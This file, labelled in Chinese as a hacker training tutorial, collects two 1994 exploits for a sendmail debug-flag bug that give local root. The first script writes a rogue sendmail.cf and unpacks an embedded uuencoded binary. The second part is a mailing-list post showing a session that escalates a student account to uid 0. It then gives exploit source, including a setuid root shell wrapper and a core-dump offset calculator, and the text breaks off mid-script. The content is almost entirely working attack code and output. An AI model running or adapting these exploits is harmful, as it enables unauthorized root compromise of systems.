sendmail2.txt

黑客培训教程

# usage:  smdhole [/path/to/suid/sendmail]

#

# add /usr/ucb to path so solaris can find `whoami` (4/18/94)

path=$path:/usr/ucb

if [ $1x = x ]; then

        sendmail=/usr/lib/sendmail

else

        echo "Trying to abuse $1."

        sendmail=$1

fi

sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`

# prefix and suffix for -1 as unsigned integer.  Actually, this is

# off by two.  you figure out why.

prefix=42949

suffix=67297

case $sm_size in

        132064)

                n1=${prefix}52864

                n2=${prefix}52865

                n3=${prefix}52866

                echo Patched solaris w/o mx.

                ;;

        134752) # ug! dropped a 0 before.  fixed 4/18/94

                n1=${prefix}01656

                n2=${prefix}01657

                n3=${prefix}01658

                echo Patched solaris sendmail.mx

                ;;

        130860)

                n1=${prefix}53016

                n2=${prefix}53017

                n3=${prefix}53018

                echo Un-patched solaris w/o mx.

                ;;

        133548) # ug! dropped a 0 before.  fixed 4/18/94

                n1=${prefix}01808

                n2=${prefix}01809

                n3=${prefix}01810

                echo Un-patched solaris sendmail.mx

                ;;

        139264)

                n1=${prefix}49609

                n2=${prefix}49610

                n3=${prefix}49611

                echo Sun 4.1.3 sendmail - could be either of two versions

                n4=${prefix}49265

                n5=${prefix}49266

                n6=${prefix}49267

                ;;

        155648)

                n1=${prefix}46953

                n2=${prefix}46954

                n3=${prefix}46955

                echo Sun 4.1.3 sendmail.mx - could be either of two versions

                n4=${prefix}46609

                n5=${prefix}46610

                n6=${prefix}46611

                ;;

        *)

                echo "I don't know what version of sendmail $sendmail is."

                echo -n "Look for other versions of sendmail[.mx] on the "

                echo "system and re-run this as:"

                echo "     $0 /path/to/another/suid/sendmail"

                echo

                echo "Let me see if I can suggest anything..."

                find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001

-ls 2>/dev/null

                exit 1

                ;;

        esac

cat << EOM > /tmp/sendmail.cf

DMether

DRlocalhost

CRlocalhost

CDMailer-Daemon root daemon uucp

DlFrom \$g  \$d

Do.:%@!^=/[]

Dq\$g\$?x (\$x)\$.

De\$j nothing

OA./aliases

OF0666

Og1

OL0

Oo

OPPostmaster

OQ.

Os

Ou1

T root daemon uucp

H?F?From: nobody

Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u

Mprog,  P=/tmp/in.telnet,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u

S0

R\$+                    \$#local \$:\$1                 just rewrite

EOM

cat $0 | sed "s:atreus::" | uudecode

uncompress /tmp/in.telnet.Z

chmod 755 /tmp/in.telnet

mkdir /tmp/mail

cp /tmp/sendmail.cf /tmp/mail

cp /bin/sh /tmp/newsh

chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami`  <Q2RA)! %(atreus

M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus

M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus

M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus

M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus

M))R!$, GQ!0$'1^!' ,. H&@4;"CP$@ EIKMFFatreus

MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus

M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2)  AT MN;AF:Z\Q@K atreus

M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus

M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus

M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I  *.%R  0BI51#1!36 $ 
4(1>7X0Y$5)%M!!R"TL$L(50[ atreus

MI8N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus

M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus

M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus

M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus

M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus

MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/X88M=U*(0N_@%atreus

M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus

MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&1"=*T8I:]*(8S:A&-\K1CGKTHR -
J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus

MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus

MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus

M7.=*U[K:]:YXS>M2_0,$UP&+!"'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus

M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"YT(VN=*=+atreus

MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus

+^MKWOOC-KW[WFUS=atreus

 atreus

endatreus

----------------------- CuT HeRe -------------------------------------

Here it is the other script:

/* What follows is a sample run exercising the latest sendmail hole and the
script used to exploit this hole. This is a re-send; I neglected to escape
the "." in the sendmail script, leaving the program slightly truncated. To
fix this, I have escaped the . so prior to executing this you must remove
the \. (does that make any sense? :-) There was also a small problem with
nested quotes pointed out by Peter Wemm which I have fixed.

This is the "small version" of the script; it assumes you have a sane
sendmail.cf. In this manner, it is not a particularly robust "breakin
script" but I believe it does illustrate how to exploit the bug.

This program uses "calc.c," the program mentioned by Timothy Newsham in an
earlier message. The program has been modified slightly so that it gives
better results (it would occasionally fail to locate the offset of a config
given a buggy sendmail. The fix is to force a sync() after it generates a
coredump.) The remainder of the program was written by myself and a fellow
student, Steven Dake.

We have held off on releasing this script until we were able to notify the
people responsible for system security at NAU. Locals subscribing to this
digest beware; sendmail on our machines has been patched! :-) */

Script started on Thu Mar 24 00:54:54 1994

[pine] [1] date

Thu Mar 24 00:54:57 MST 1994

[pine] [2] whoami

jwa

[pine] [3] id

uid=4473(jwa) gid=400(student)

[pine] [4] ls -l sendbug.sh

-rwx------   1 jwa      student     4893 Mar 24 00:46 sendbug.sh*

[pine] [5] sendbug.sh

Creating setid0 ...

Creating calc...

Scanning core image for /nau/local/lib/mail/sendmail.cf...

Creating alias.sh ...

Creating fake alias file...

Faking alias pointer in new config file...

Creating the sendmail script...

Executing /usr/lib/sendmail -

d4294935548.47,4294935549.116,4294935550.109,4294935551.112,4294935552.47,429493
5553.115,429

4935554.109,4294935555.46,4294935556.9

Version 8.6.4

220-pine.cse.nau.edu Sendmail 8.6.4/WHOOP-v1.0 ready at Thu, 24 Mar 1994

00:55:21 -0700

220 ESMTP spoken here

250 pine.cse.nau.edu Hello jwa@localhost, pleased to meet you

250 ... Sender ok

250 ... Recipient ok

354 Enter mail, end with "." on a line by itself

250 AAA01803 Message accepted for delivery

503 Need MAIL before RCPT

503 Need MAIL command

500 Command unrecognized

500 Command unrecognized

221 pine.cse.nau.edu closing connection

setid0 is a suid shell.  executing...

executing /bin/csh...

pine# whoami

root

pine# id

uid=0(root) gid=0(root)

pine# exit

pine# end of script.

. and here's the program.

#!/bin/sh

# exploit new sendmail bug to give us a root shell

# 24 mar 94  jwa/scd @nau.edu

# "short version"

# tested on sunos 5.2/sendmail 8.6.4

# location of sendmail

SENDMAIL=/usr/lib/sendmail

# location of original sendmail.cf file

CONFIG=/nau/local/lib/mail/sendmail.cf

#CONFIG=`strings $SENDMAIL | grep sendmail.cf`

# program to execute as root

SHELL=/bin/csh

TEMPDIR=/tmp/sendbug-tmp.$$

mkdir $TEMPDIR

chmod 700 $TEMPDIR

cd $TEMPDIR

cp $SENDMAIL sm

chmod 700 sm

echo "Creating setid0 ..."

cat > setid.c << _EOF_

/* set uid to zero, thus escaping the annoying csh and solaris sh

 * problem..

 *

 * if (getuid() != geteuid()) {

 *  printf("permission denied, you root-hacker you.\n");

 *  exit(1);

 * }

 *

 * .. must be run euid 0, obviously.  with no args it runs /bin/sh,

 * otherwise it runs the 1st arg.

 */

#include <stdio.h>

main(argc, argv)

int argc;

char *argv[];

 int uid;

 setuid(0);

 setgid(0);

 seteuid(0);  /* probabally redundant. */

 setegid(0);

 uid = getuid();

 if (uid != 0) {

  printf("setuid(0); failed!  aborting..\n");

  exit(1);

 }

 if (argc !=2) {

  printf("executing /bin/sh...\n");

  system("/bin/sh");

 }

  else

 {

  printf("executing %s...\n", argv[1]);

  system(argv[1]);

 }

_EOF_

cc -o setid0 setid.c

echo "Creating calc..."

cat > calc.c << _EOF_

/*

 * Determines offset in sendmail of

 * sendmail.cf file location.

 * author: timothy newsham

 */

#include <fcntl.h>

gencore()

  int pid;

  int fd[2];

  if(pipe(fd) < 0) {

    perror("pipe");

    exit(1);

    return(0);

  }

  pid = fork();

  if(!pid) {

    int f = open("./out", O_RDWR|O_CREAT, 0666);

    dup2(f, 1); dup2(fd[0], 0);

    close(f); close(fd[1]); close(fd[0]);

    execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);

    perror("exec");

    exit(0);

  } else {

    sleep(2);

    kill(pid, 11);

  }

  close(fd[0]);

  close(fd[1]);

main(argc,argv)

char **argv;

int argc;

  unsigned int ConfFile,tTdvect,off;

  gencore();

  sync();   /* grr. */

  tTdvect = find("ZZZZZZZZ", "core");

  ConfFile = find(argv[1], "core");

  if(!tTdvect || !ConfFile) {

   return(1);

  }

  off = ConfFile - tTdvect;



printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",  
off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \

  off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);

int find(pattern, file)

char *pattern,*file;

  int fd;

  int i, addr;

  char c;

  fd = open(file, 0);

  i = 0;

  addr = 0;

  while(read(fd, &c, 1) == 1) {

    if(pattern[i] == c)

      i++;

    else

      i=0;

    if(pattern[i] == '\0') {

      addr -= strlen(pattern);

      return(addr);

    }

    addr++;

  }

  return(0);

_EOF_

cc calc.c -o calc

echo "Scanning core image for $CONFIG..."

DEBUGFLAGS=`calc $CONFIG`

echo "Creating alias.sh ..."

echo "#!/bin/sh

# this program will be executed when mail is sent to the fake alias.